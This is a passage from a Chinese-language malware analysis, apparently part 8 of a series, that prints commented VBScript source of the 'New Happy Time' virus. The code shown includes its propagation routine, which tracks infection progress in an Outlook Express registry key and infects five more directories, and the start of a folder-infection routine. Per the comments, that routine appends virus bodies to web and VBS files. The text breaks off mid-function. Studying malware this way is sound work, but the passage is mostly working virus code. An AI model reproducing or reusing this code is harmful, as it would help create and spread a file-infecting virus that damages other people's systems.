新欢乐时光代码分析(8)
SubString = Mid(CurrentString, LastIndexChar + 1, Len(CurrentString) - LastIndexChar -1)
CurrentString = KJChangeSub(CurrentString, LastIndexChar)
End If
End If
Loop
KJOboSub = CurrentString
End Function
' 函数:KJPropagate()
' 功能:病毒传播
Function KJPropagate()
On Error Resume Next
RegPathvalue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
DiskDegree = WsShell.RegRead(RegPathvalue)
' 如果不存在Degree这个键值,DiskDegree则为FinalyDisk盘
If DiskDegree = "" Then
DiskDegree = FinalyDisk & ":\"
End If
' 继DiskDegree置后感染5个目录
For i = 1 To 5
DiskDegree = KJOboSub(DiskDegree)
KJummageFolder(DiskDegree)
Next
' 将感染记录保存在"HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"键值中
WsShell.RegWrite RegPathvalue, DiskDegree
End Function
' 函数:KJummageFolder(PathName)
' 功能:感染指定目录
' 参数:
' PathName 指定目录
Function KJummageFolder(PathName)
On Error Resume Next
' 取得目录中的所有文件集
Set FolderName = FSO.GetFolder(PathName)
Set ThisFiles = FolderName.Files
HttExists = 0
For Each ThisFile In ThisFiles
FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
' 判断扩展名
' 若是HTM,HTML,ASP,PHP,JSP则向文件中追加HTML版的病毒体
' 若是VBS则向文件中追加VBS版的病毒体
' 若是HTT,则标志为已经存在HTT了
内容版权声明:除非注明,否则皆为本站原创文章。